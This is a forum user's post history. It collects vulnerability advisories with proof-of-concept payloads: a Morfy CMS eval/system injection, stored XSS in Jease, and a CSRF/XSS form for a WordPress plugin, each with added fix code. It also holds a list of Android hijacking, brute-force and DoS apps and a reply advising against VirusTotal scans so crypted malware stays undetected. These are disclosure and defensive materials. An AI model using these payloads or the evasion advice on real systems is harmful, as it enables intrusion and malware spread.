Everything posted by Aerosol
-
Document Title:
===============
Morfy CMS v1.05 - Command Execution Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1367
https://github.com/Awilum/monstra-cms/issues/351
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9185

CVE-ID:
=======
CVE-2014-9185

Release Date:
=============
2014-12-10

Vulnerability Laboratory ID (VL-ID):
====================================
1367

Common Vulnerability Scoring System:
====================================
6.2

Product & Service Introduction:
===============================
Morfy is a flat file CMS, which means there is no administration backend or database to deal with. You simply create .md files in the `content` folder and each one becomes a page. To run Morfy you simply need PHP 5.3.0 or higher with PHP's Multibyte String module. Operating system: Unix, Linux, Windows, Mac OS. Webserver: Apache with Mod Rewrite or Nginx with Rewrite Module.

(Copy of the Vendor Homepage: http://morfy.monstra.org/documentation )

Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory Researcher discovered a remote command execution vulnerability in the official Morfy v1.05 Content Management System.

Vulnerability Disclosure Timeline:
==================================
2014-11-02: Researcher Notification & Coordination (Paulos Yibelo)
2014-12-10: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
GNU GPL License
Product: Morfy - Content Management System 1.05

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
A command execution web vulnerability has been discovered in the official Morfy v1.05 Content Management System. The vulnerability allows an attacker the unauthorized execution of system-specific commands, compromising the online web application or connected DBMS.

The vulnerability is located in the site_url parameter of the default content management system install.php file. Remote attackers are able to execute system-specific commands to compromise the application by means of malicious requests that run through the vulnerable site_url value. The request method to inject the code is POST via Add.

The security risk of the vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) count of 6.2. Exploitation of the web vulnerability requires no privileged application user account or user interaction. Successful exploitation of the command execution vulnerability results in content management system compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Install

Vulnerable File(s):
[+] install.php

Vulnerable Parameter(s):
[+] site_url

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without user interaction or a privileged application user account. For security demonstration or to reproduce the security vulnerability, follow the provided information and steps below.

Manual steps to reproduce the security vulnerability ...
1. Download the Morfy content management system
2. Use the default and access the installation file (install.php)
3. Inject the following payload `website.com}','yibelo'=> eval("system('dir');"),` (as website url) by usage of the Add function
4. Then navigate to site.com/config.php, which gets executed because the value results in site_url'='website.com}','yibelo'=>eval("system('dir');"),//',
5. Successful reproduction of the security vulnerability!

Vulnerable Source: install.php < config.php

./install.php Line 57
    $post_site_url = isset($_POST['site_url']) ? $_POST['site_url'] : '';

./install.php Line 64-77
    file_put_contents('config.php', "<?php
    return array(
        'site_url' => '{$post_site_url}',
        'site_charset' => 'UTF-8',
        'site_timezone' => '{$post_site_timezone}',
        'site_theme' => 'default',
        'site_title' => '{$post_site_title}',
        'site_description' => '{$post_site_description}',
        'site_keywords' => '{$post_site_keywords}',
        'email' => '{$post_email}',
        'plugins' => array(
            'markdown',
            'sitemap',
        ),
    );");

Reference(s):
http://morfy.127.0.0.1:8080/install.php
http://morfy.127.0.0.1:8080/config.php

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction in the config.php file that requests the vulnerable site_url value. Encode and parse the vulnerable site_url in the add input field of the installation module (install.php). Restrict the input fields and disallow special chars to prevent system-specific command execution.

Security Risk:
==============
The security risk of the remote command execution vulnerability in the PHP engine of the web application is estimated as high. (CVSS 6.2)

Credits & Authors:
==================
Paulos Yibelo [Independent Vulnerability Researcher]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:  www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:  admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section:  magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social:   twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:    vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material, contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get permission.

Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
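The installer quoted in the advisory builds config.php by interpolating the raw site_url into PHP source, which is why a quote in the value becomes code. The following is an added example (not Morfy's own code) of the safe way to generate such a file: validate the value, let var_export() produce the literal, and verify the written file round-trips. It assumes PHP 7 or newer; the function names are hypothetical.

```php
<?php
// Added example, not Morfy's own code. The installer on the page builds
// config.php by interpolating the raw $_POST['site_url'] into a PHP source
// string, so a quote in the value changes the code that config.php later
// executes. The safe pattern below never concatenates PHP source: it
// validates the value, lets var_export() emit a correctly quoted literal,
// and checks that the written file parses back to the intended array.
// Assumes PHP 7 or newer (scalar type declarations, the ?? operator).

function validate_site_url(string $raw): string
{
    $url = trim($raw);
    // filter_var() gives a first syntactic check; the explicit host check
    // below does not depend on which PHP version validates host names.
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        throw new InvalidArgumentException('site_url is not a valid URL');
    }
    $parts = parse_url($url);
    if ($parts === false) {
        throw new InvalidArgumentException('site_url cannot be parsed');
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    $host   = $parts['host'] ?? '';
    if (!in_array($scheme, ['http', 'https'], true)) {
        throw new InvalidArgumentException('site_url must use http or https');
    }
    // Only letters, digits, dots and hyphens may appear in the host part.
    if (!preg_match('/^[A-Za-z0-9.-]+$/', $host)) {
        throw new InvalidArgumentException('site_url host contains invalid characters');
    }
    return $url;
}

function build_config_array(array $post): array
{
    return [
        'site_url'         => validate_site_url($post['site_url'] ?? ''),
        'site_charset'     => 'UTF-8',
        'site_timezone'    => (string) ($post['site_timezone'] ?? 'UTC'),
        'site_theme'       => 'default',
        'site_title'       => (string) ($post['site_title'] ?? ''),
        'site_description' => (string) ($post['site_description'] ?? ''),
        'site_keywords'    => (string) ($post['site_keywords'] ?? ''),
        'email'            => (string) ($post['email'] ?? ''),
        'plugins'          => ['markdown', 'sitemap'],
    ];
}

function build_config_source(array $config): string
{
    // var_export() escapes quotes and backslashes, so user input can only
    // ever be the contents of a string literal, never additional PHP code.
    return "<?php\nreturn " . var_export($config, true) . ";\n";
}

function write_config(string $path, array $post): void
{
    $config = build_config_array($post);
    $tmp    = $path . '.tmp';
    file_put_contents($tmp, build_config_source($config), LOCK_EX);
    // Round-trip check: the generated file must evaluate to exactly the
    // array we meant to write before it replaces the live config.
    $loaded = include $tmp;
    if ($loaded !== $config) {
        unlink($tmp);
        throw new RuntimeException('generated config did not round-trip');
    }
    rename($tmp, $path);
}

// Constructed input shaped like the advisory's payload. With string
// interpolation it would add a second array element to config.php; here it
// is rejected before anything is written.
$hostile = ['site_url' => "http://website.com}','yibelo'=>eval(\"system('dir');\"),//"];
try {
    write_config(sys_get_temp_dir() . '/config.php', $hostile);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ' . $e->getMessage() . "\n";
}

// A benign value passes validation and is written as a quoted literal.
write_config(sys_get_temp_dir() . '/config.php', ['site_url' => 'https://example.com/']);
```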
-
Document Title:
===============
Jease CMS v2.11 - Persistent UI Web Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1373

Release Date:
=============
2014-12-12

Vulnerability Laboratory ID (VL-ID):
====================================
1373

Common Vulnerability Scoring System:
====================================
3.7

Product & Service Introduction:
===============================
Jease is an Open Source Content-Management-System which is driven by the power of Java. Jease means `Java with Ease`, so Jease promises to keep simple things simple and the hard things (j)easy. Content-Management with Jease. Jease is built on top of the most advanced open-source technologies existing in the Java community. Jease glues these technologies together to provide an outstanding productive development experience by combining the safety and IDE/compiler support of Java with the turn-around times of scripting languages.

(Copy of the Vendor Homepage: http://www.jease.org/ )

Abstract Advisory Information:
==============================
The independent Vulnerability Laboratory Researcher (Manideep K.) discovered a persistent input validation web vulnerability in the Jease 2.11 CMS.

Vulnerability Disclosure Timeline:
==================================
2014-12-12: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Jease
Product: Jease - Content Management System 2.11

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official Jease v2.11 Content Management System. The vulnerability allows an attacker to inject their own script code as payload into the application-side of the vulnerable service function.

The vulnerability is located in the content values of the create function. Local attackers with low privileged application user accounts are able to manipulate the content input values by usage of the create functions. The execution of the persistent script code occurs in the view browser module of the content management system. The attack vector is persistent on the application-side and the request method to inject is POST. The issue allows the transfer of persistent malicious script code to the frontend service.

The security risk of the application-side web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 3.7. Exploitation of the application-side web vulnerability requires a low privileged web application user account and low user interaction. Successful exploitation of the vulnerability results in persistent phishing mails, session hijacking, persistent external redirects to malicious sources and application-side manipulation of affected or connected module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Create

Vulnerable Parameter(s):
[+] content

Affected Module(s):
[+] View - Browser Service

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers without a privileged application user account and with low user interaction. For security demonstration or to reproduce the security vulnerability, follow the provided information and steps below.

Manual steps to reproduce:
1. Install the Content Management System
2. Open the online service to interact (link - http://jease.127.0.0.1:8080/login?file&auth )
3. Click to include on any entry (alternatively, you can create one and reproduce) and enter the following parameters in the Content section. Note: select the plaintext option present at the end of the content box
4. Enter "<script>alert(document.cookie)</script>" in the box and press the view in browser option. Note: the request gets saved and is now persistently included in the browser module service
5. Successful reproduction of the vulnerability!

Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the Jease CMS is estimated as medium. (CVSS 3.7)

Credits & Authors:
==================
Manideep K. - Information Security Researcher [https://in.linkedin.com/in/manideepk]

Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
-
Document Title:
===============
Bird Feeder v1.2.3 WP Plugin - CSRF & XSS Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1372
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9334

CVE-ID:
=======
CVE-2014-9334

Release Date:
=============
2014-12-09

Vulnerability Laboratory ID (VL-ID):
====================================
1372

Common Vulnerability Scoring System:
====================================
3.6

Product & Service Introduction:
===============================
This WordPress plugin will add the necessary data to the WordPress article feeds so that they can be picked up and processed correctly by the Bird Feeder Mint Pepper, without requiring any changes to any core WordPress files. This plug-in serves one purpose and that is to tweet published posts. It doesn't do anything other than tweet. It tweets in this format: [your message] [post title] [short url]. On the options page you will have to enter your Twitter username and password. You can also configure your message there. If you try to publish a bunch of posts quickly, the Bird Feeder url shortening service will not handle them and will result in unexpected tweets.

(Copy of the Vendor Homepage: https://wordpress.org/plugins/bird-feeder/ )

Abstract Advisory Information:
==============================
The independent Vulnerability Laboratory Researcher (Manideep K.) discovered a cross site request forgery issue and a cross site scripting vulnerability in the bird feeder v2.1 wordpress plugin.

Vulnerability Disclosure Timeline:
==================================
2014-11-06: Author Notification (Manideep K.)
2014-11-20: WP Team action taken by closing the plugin and service
2014-12-09: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Wordpress
Product: Bird Feeder - Wordpress Plugin (Web-Application) 1.2.3

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A cross site request forgery issue and a cross site scripting vulnerability have been discovered in the Bird Feeder v1.2.3 Plugin. The plugin is vulnerable to a combined CSRF/XSS attack, meaning that if an admin user can be tricked into visiting a specially crafted URL created by a remote attacker (via spear phishing/social engineering), the attacker can insert arbitrary script code into the admin page. Once exploited, the admin's browser can be made to do almost anything the admin user could typically do, by hijacking the admin's cookies etc.

Proof of Concept (PoC):
=======================
You can use the following exploit code to exploit the vulnerability. For testing, you can just save it as .html and then get it clicked by a logged-in administrator (by social engineering/spear phishing techniques) and see the exploit in action. Most of the fields are vulnerable to the CSRF + XSS attack.

    <html>
    <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php?page=bird-feeder" method="POST">
    <input type="hidden" name="user" value="csrf/xss testing " />
    <input type="hidden" name="password" value="csrf/xss testing" />
    <input type="hidden" name="message" value="" />
    <input type="hidden" name="update" value="Update" />
    <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>

Solution - Fix & Patch:
=======================
2014-11-20: WP Team action taken by closing the plugin and service

Security Risk:
==============
The security risk of the cross site request forgery and cross site scripting web vulnerability is estimated as medium. (CVSS 3.6)

Credits & Authors:
==================
Manideep K. - Information Security Researcher [https://in.linkedin.com/in/manideepk]

Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
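The PoC form works because the options page accepts the POST without any proof that the request came from the admin's own page, and then echoes the saved values back without escaping. Below is an added example (not the Bird Feeder plugin's own code) of how a WordPress options page for the same three fields closes both issues. It assumes it runs inside WordPress so the plugin API functions are loaded; the nonce action name and option keys are hypothetical.

```php
<?php
// Added example, not the Bird Feeder plugin's code. A minimal WordPress
// options page for the user/password/message fields from the advisory that
// (a) rejects cross-site POSTs with a nonce check and (b) escapes stored
// values on output. Assumes the WordPress plugin API is loaded.

// Hypothetical action name bound to the nonce; any fixed string works.
const BIRD_FEEDER_NONCE_ACTION = 'bird_feeder_save_options';

function bird_feeder_handle_post(): void
{
    if (!isset($_POST['update'])) {
        return;
    }
    // 1. Capability check: only users allowed to manage options may save.
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions');
    }
    // 2. CSRF check: the request must carry a nonce that WordPress issued
    //    to this user for this action. A form hosted on another site cannot
    //    obtain it, so the advisory's cross-site POST dies here.
    check_admin_referer(BIRD_FEEDER_NONCE_ACTION);

    // 3. Sanitize on input: strips tags, control characters and slashes.
    $user    = sanitize_text_field(wp_unslash($_POST['user'] ?? ''));
    $message = sanitize_text_field(wp_unslash($_POST['message'] ?? ''));
    $pass    = (string) wp_unslash($_POST['password'] ?? '');

    update_option('bird_feeder_user', $user);
    update_option('bird_feeder_message', $message);
    if ($pass !== '') {
        update_option('bird_feeder_password', $pass);
    }
}

function bird_feeder_render_page(): void
{
    bird_feeder_handle_post();
    $user    = get_option('bird_feeder_user', '');
    $message = get_option('bird_feeder_message', '');
    ?>
    <form method="post">
        <?php wp_nonce_field(BIRD_FEEDER_NONCE_ACTION); ?>
        <!-- 4. Escape on output: esc_attr() neutralises quotes and angle
             brackets, so a stored value cannot break out of the attribute
             and become script. The password is never echoed back at all. -->
        <label>User
            <input type="text" name="user" value="<?php echo esc_attr($user); ?>">
        </label>
        <label>Password
            <input type="password" name="password" value="">
        </label>
        <label>Message
            <input type="text" name="message" value="<?php echo esc_attr($message); ?>">
        </label>
        <input type="submit" name="update" value="Update">
    </form>
    <?php
}
```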
-
Dude, you scanned the stub, it's pretty much the same thing...
-
You deserve to be banned. How can you scan with VIRUS TOTAL? All the FUD will be gone in 1-2 days... haven't you learned anything in all the time you've been here? VirusTotal sends samples to the antivirus vendors, so DO NOT SCAN.
-
Since I have been working at MailAgent, I have noticed how little attention some companies pay to the security of their databases. From an email marketing point of view, the database is the most valuable thing a company can have. The more carefully a database is collected and the more demographic data it contains, the more useful it can be to the company. But what exactly are you doing to protect your database from the disgruntled employee?

The online environment

Very many companies leave employees' access to personal email addresses (Yahoo, Gmail, etc.) or cloud storage services wide open. Most of the time, employees who are unhappy or about to leave prepare the ground and send confidential information to their personal email addresses. As a solution, besides blocking the well-known email services, it would be advisable to also monitor internal communications. A simple method would be to configure the email server so that everything sent and received by email within the company is also sent to a monitored email address.

The offline environment

External storage: I don't know how many companies block USB sticks and external HDDs on office computers. Since the strong penetration of smartphones, most employees connect their phone to the office computer. This should be monitored too.

CRM or back office

Do you give everyone access to the database? Can everyone export the database from the site admin or the company CRM? It is advisable that access to the database be granted only to certain trusted people. If several people have access to the database, at least each of them should have their own username and password, and it should be monitored who exports what.

At MailAgent we have developed a very well-thought-out user system. If more than one person needs to work in the application, separate users are created for everyone who needs one. This way, it is known at any moment whether someone exports the database, from which IP and at what time. We have come across situations where the person working in the application was fired and, once home, exported the database. As a practice, we recommend first restricting the employee's access to all areas from which they could extract vital information, and only then dismissing them.

Besides the multi-user system, there are also users with different access levels. So if you have an employee who only builds and tests the layout, they are given a user with access only to the email composition and sending part, while another employee has access to the databases and reports.

Taking the above into account, how have you thought about protecting your database in the future, so as to prevent an unpleasant event?
-
I read what I posted, relax... as for the age of the post, the tools are still useful... "Why do you still use Windows, it's old". I changed dSploit to zANTI, link: https://www.zimperium.com/zanti-mobile-penetration-testing
-
Nowadays, smartphones and tablets are the most popular gadgets. If we look at recent stats, global PC sales have also been decreasing for the past few months. The reason behind this is that people use tablets for most of their work. And there is no need to explain that Android is ruling the global smartphone and tablet markets. Android is the most popular mobile OS with more than 60% market share. So, companies are now focusing on bringing their software as a mobile app for Android. These apps include office apps, photo editing apps, instant messaging apps and penetration testing apps.

If you have an Android smartphone, you can start your next penetration testing project from your Android phone. There are a few Android apps that can turn your Android device into a hacking device. These apps have many limitations, though, and can only be used for a few specific tasks. You can never get the same experience as you get with your PC, but smaller jobs can be performed. Apps for penetration testers are not widely available, but hackers can enjoy this platform in a better way. There are many Wi-Fi hacking and sniffing apps available.

As we already said, Android is ruling the smartphone and tablet markets, so developers are also creating more apps for Android devices. This is the reason why the Android market has millions of apps. Like websites, apps also need penetration testing to check for various vulnerabilities. Security testing for Android apps requires a penetration testing environment on your Android device.

Note: These apps are not for beginners, because expertise on the Android platform is needed. Most of the apps work on rooted Android devices, so root your Android device first. If you are not sure how to do it, learn how by reading one of the many sites available to help with this process. You will lose your device's warranty if you root it, so think twice before proceeding. These apps can also harm your Android device, so please try these apps at your own risk.

In this detailed post, we will see various apps for web application penetration testing, network penetration testing, sniffing, network hacking and Android app penetration testing.

Android apps for penetration testing

1. zANTI

zANTI is a nice Android network penetration testing suite. It comes with all-in-one network analysis capabilities. Like most of the other penetration testing tools, it is also free. So, you can download and use this app on your Android device and perform network security testing. It has various pre-compiled modules to use. The app is designed to be very fast, handy and easy to use; it's just point and click. zANTI supports all Android devices running Android 2.3 Gingerbread or higher, and you also need to root your device. If you are a newbie, we will never recommend you use the app if you don't know how to root your Android device. After rooting your device, you need to install BusyBox Installer.

Download BusyBox from Google Play Store: https://play.google.com/store/apps/details?id=com.jrummy.busybox.installer&hl=en

Then download the app from the link given below. The app is available on GitHub: https://github.com/evilsocket/dsploit/downloads

Update, zANTI link: https://www.zimperium.com/zanti-mobile-penetration-testing

These are the available modules in the app:
- RouterPWN
- Trace
- Port Scanner
- Inspector
- Vulnerability Finder
- Login Cracker
- Packet Forger
- MITM

2. Network Spoofer

Network Spoofer is another nice app that lets you change the website on other people's computers from your Android phone. Download the Network Spoofer app and then log onto the Wi-Fi network. Choose a spoof to use with the app, then tap on start. This app is considered a malicious hacking tool by network administrators, so don't try it on unauthorized networks. This is not a penetration testing app; it's just to demonstrate how vulnerable the home network is.

Download this app from SourceForge: Network Spoofer | SourceForge.net

3. Network Discovery

Network Discovery is a free app for the Android device. The good thing is that the app doesn't need a rooted device. This app has a simple and easy to use interface. It views all the networks and devices connected to your Wi-Fi network. The application identifies the OS and manufacturer of the device. Thus the app helps in information gathering on the connected Wi-Fi network.

Download the app from Google Play: https://play.google.com/store/apps/details?id=info.lamatricexiste.network

4. Shark for Root

Shark for Root is a nice traffic sniffer app for the Android device. It works fine on both 3G and Wi-Fi network connections. You can see the dump on the phone by using Shark Reader, which comes with the app. You can also use Wireshark, a similar tool, to open the dump on the system. So, start sniffing data on your Android device and see what others are doing.

5. Penetrate Pro

Penetrate Pro is a nice Android app for Wi-Fi decoding. The latest version of the app has added many nice features. It can calculate the WEP/WPA keys for some wireless routers. If you have installed an antivirus app, it may detect the Penetrate Pro app as a virus, but this app is a security tool and it will not affect or harm your device. Penetrate gives you the wireless keys of Discus, Thomson, Infinitum, BBox, Orange, DMax, SpeedTouch, DLink, BigPond, O2Wireless and Eircom routers.

6. DroidSheep [Root]

DroidSheep is a session hijacking tool for Android devices. This is an app for security analysis in wireless networks. It can capture Facebook, Twitter, LinkedIn, Gmail or other website accounts easily. You can hijack any active web account on your network with just a tap by using the DroidSheep app. This app demonstrates the harm of using any public Wi-Fi.

Download this app from here: Downloads | DroidSheep

7. DroidSheep Guard

DroidSheep Guard is another Android app from the developer of DroidSheep. This app does not require a rooted device. This app monitors the Android device's ARP table and tries to detect ARP spoofing attacks on the network performed by DroidSheep, FaceNiff and other software.

Download DroidSheep Guard from Google Play: https://play.google.com/store/apps/details?id=de.trier.infsec.koch.droidsheep.guard.free&feature=search_result

8. WPScan

WPScan is the WordPress vulnerability scanner for Android devices. This nice app is used to scan a WordPress based website and find all the security vulnerabilities it has. WPScan also has a desktop version that is much more powerful than the Android app. We know that WordPress is one of the most popular CMSes and is used by millions of websites. The Android version of the app comes with a few nice features. The app was released on Google Play, but Google removed it. The full source code of the app is available from GitHub. One thing to note is that the WPScan Android app is not related to the desktop version of WPScan, so never think of it as an official WPScan app.

Download the app and source code: https://github.com/clshack/WPScan

9. Nessus

Nessus is a popular penetration testing tool that is used to perform vulnerability scans with its client/server architecture. It also released a mobile app to bring its power to mobile devices. The Nessus Android app can perform the following tasks:
- Connect to a Nessus server (4.2 or greater)
- Launch existing scans on the server
- Start, stop or pause running scans
- Create and execute new scans and scan templates
- View and filter reports

This app was released on the Google Play store almost 2 years back by Tenable Network Security. Later Google removed the app from the Play store. Now the official link has been removed, so you can try the download links available on third party websites. But be careful and check the app first.

10. FaceNiff

FaceNiff is another nice sniffing app for Android devices. It requires a rooted Android device. It can sniff and intercept web sessions over Wi-Fi. This app is similar to DroidSheep, added earlier in the post. You can also call it Firesheep for Android devices. Use of this app may be illegal in your area, so use it wisely.

11. WebSecurify

WebSecurify is a powerful web vulnerability scanner. It's available for all popular desktop and mobile platforms. It has a powerful crawler to crawl websites and then attack them using pre-defined patterns. We have already covered it in detail in our previous article. You can read the older article for a better understanding.

Download it here: https://code.google.com/p/websecurify/

12. Network Mapper

Network Mapper is a fast scanner for network admins. It can easily scan your network and export the report as CSV to your Gmail. It lists all devices in your LAN along with details. Generally, the app is used to find open ports of various servers like FTP servers, SSH servers, SMB servers etc. on your network. The tool works really fast and gives effective results.

Download Network Mapper from the Google Play Store: https://play.google.com/store/apps/details?id=org.prowl.networkmapper&hl=en

13. Router Bruteforce ADS 2

If you are connected to a Wi-Fi network and you want to access the router of the network, you can use the Router Bruteforce ADS 2 app. This app performs a brute force attack to get the valid password of the router. It has a list of default passwords that it tries on the router. Most of the time, the app cracks the password, but you cannot be 100% sure in a brute force attack. It comes with a sample txt file which contains 398 default passwords used in different routers. You can add more passwords to the list. But there is one limitation: this app only works with dictionary files of less than 5 MB. And try it only when you have a good Wi-Fi signal. This is an experimental app and the developer also warns users to try it at their own risk.

Download Router Bruteforce ADS 2 from Google Play: https://play.google.com/store/apps/details?id=evz.android.rbf_ads&hl=en

14. AnDOSid

AnDOSid is another nice application that can be used to perform DoS attacks from Android mobile phones. It is like the LOIC tool for desktop. In the app, you can set the target URL, payload size and time difference between two requests. After that, click on the big GO button to launch a DoS attack on a website. It will start flooding the target URL with fake requests. Use this app if you have a powerful device; avoid it if you have a low cost entry level device.

15. AppUse - Android Pentest Platform Unified Standalone Environment

The AppUse Virtual Machine is developed by AppSec Labs. It's a freely available mobile application security testing platform for Android apps. This Android penetration testing platform contains custom made tools by AppSec Labs. This penetration testing platform is for those who are going to start penetration testing of Android applications. All you need is to download the AppUse Virtual Machine and then load the app for testing. The VM comes with most of the configuration done, so you do not need to install simulators or testing tools, and there is no need for SSL certificates for the proxy. Thus, the tool gives an ideal user experience. In other words, you can say that the AppUse Virtual Machine is Backtrack for Android apps. As we know that the world is moving towards apps, AppUse VM has good scope in the future. We see how Android users face attacks and these cyber-attacks are growing. So, it is important for all Android app developers to test their apps for various kinds of vulnerabilities.

Download the AppUse Virtual Machine here: Download AppUse from SourceForge.net

Conclusion

Android is one of the fastest growing mobile platforms with the biggest market share. People also claim that it could replace desktop OSes as well. Although we do not agree with that, we cannot ignore its importance. This is why developers are bringing their tools to the Android platform as well. In this post, I have listed a few Android apps for hackers and security researchers.
You can say that these apps are not as powerful as desktop hacking tools. But you can still enjoy these hacking tools for most of your tasks. Most of the hacking apps are related to networking and spoofing. All these apps do this task on Wi-Fi. Few web scanners are also available that lets security researchers find vulnerability on web applications. You can also launch DOS attack on a website direct from your smartphone or tablet. This could be a better hacking tool. If you are into the security field, you can try these apps and see how these work. Source
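The post describes DroidSheep Guard as watching the device's ARP table for the spoofing that DroidSheep and FaceNiff rely on. The script below is an added example of that detection logic, written for this post; it is not DroidSheep Guard's own code. It parses two snapshots in the `/proc/net/arp` format that Linux and Android expose (the snapshots are constructed, with `192.168.1.1` as the assumed gateway) and raises an alert when an IP's MAC address changes between snapshots or when one MAC claims several IPs, which is what a poisoned gateway entry looks like.

```python
"""ARP-table based ARP-spoofing detector (added example, not DroidSheep Guard code).

Reads /proc/net/arp style text, keeps only complete entries (flags 0x2) and
compares two snapshots. Two signals are reported:
  1. an IP whose hardware address changed between snapshots;
  2. a hardware address that now answers for more than one IP.
Either signal involving the gateway is rated HIGH.
"""

# Constructed snapshot: healthy table, gateway at 192.168.1.1.
ARP_BEFORE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         00:11:22:33:44:55     *        wlan0
192.168.1.23     0x1         0x2         aa:bb:cc:dd:ee:01     *        wlan0
192.168.1.40     0x1         0x0         00:00:00:00:00:00     *        wlan0
"""

# Constructed snapshot: host .23 has poisoned the gateway entry with its own MAC.
ARP_AFTER = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         aa:bb:cc:dd:ee:01     *        wlan0
192.168.1.23     0x1         0x2         aa:bb:cc:dd:ee:01     *        wlan0
"""

GATEWAY_IP = "192.168.1.1"   # assumed gateway for this example


def parse_arp_table(text):
    """Return {ip: mac} for complete entries; incomplete (0x0) rows are skipped."""
    table = {}
    for line in text.strip().splitlines()[1:]:          # first line is the header
        parts = line.split()
        if len(parts) < 6:
            continue
        ip, flags, mac = parts[0], parts[2], parts[3]
        if flags != "0x2":
            continue
        table[ip] = mac.lower()
    return table


def arp_alerts(previous, current, gateway_ip=None):
    """Compare two parsed tables and return a list of (severity, message)."""
    alerts = []
    # Signal 1: MAC for a known IP changed.
    for ip, mac in current.items():
        old = previous.get(ip)
        if old is not None and old != mac:
            sev = "HIGH" if ip == gateway_ip else "MEDIUM"
            alerts.append((sev, "%s changed from %s to %s" % (ip, old, mac)))
    # Signal 2: one MAC claims several IPs.
    by_mac = {}
    for ip, mac in current.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            sev = "HIGH" if gateway_ip in ips else "MEDIUM"
            alerts.append((sev, "%s claims %s" % (mac, ", ".join(sorted(ips)))))
    return alerts


def check_snapshots(before_text, after_text, gateway_ip=GATEWAY_IP):
    """Convenience wrapper: parse both snapshots and return the alerts."""
    return arp_alerts(parse_arp_table(before_text), parse_arp_table(after_text), gateway_ip)


if __name__ == "__main__":
    for severity, message in check_snapshots(ARP_BEFORE, ARP_AFTER):
        print("[%s] %s" % (severity, message))
```

On a real device you would read `/proc/net/arp` periodically and feed consecutive reads to `check_snapshots`; a MAC change for the gateway with no matching change of router is the strongest single indicator that a host on the LAN is running an ARP spoofer.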
-
When official details of the new features in Android 5.0 Lollipop were released last week, Android Smart Lock piqued my interest. It is a lock screen feature that uses Bluetooth connectivity between a user's Android 5.0 devices to unlock phone and tablet screens when they are within the broadcast range of another Android 5.0 smartwatch or an Android Auto embedded system.

It is likely that Android's development team tested the waters by collaborating with the Chrome OS development team. A feature called Easy Unlock entered the Chrome development channel last spring. If you enable the feature in the development channel and you are a competent enough coder, you may be able to test Easy Unlock yourself. You may need both an Android mobile device and a Chromebook in developer mode, with the feature enabled on both devices. If the code is workable by now, when properly configured it should allow you to unlock your Chromebook with your Android phone or tablet. I am not sure which versions of Android, Chrome OS or Chromium OS are needed, nor do I know what the package dependencies may be, so if you are going to try Easy Unlock, you will be doing so at your own risk. It is possible that when Easy Unlock is stable it will be renamed Smart Lock, to match the new Android 5.0 feature.

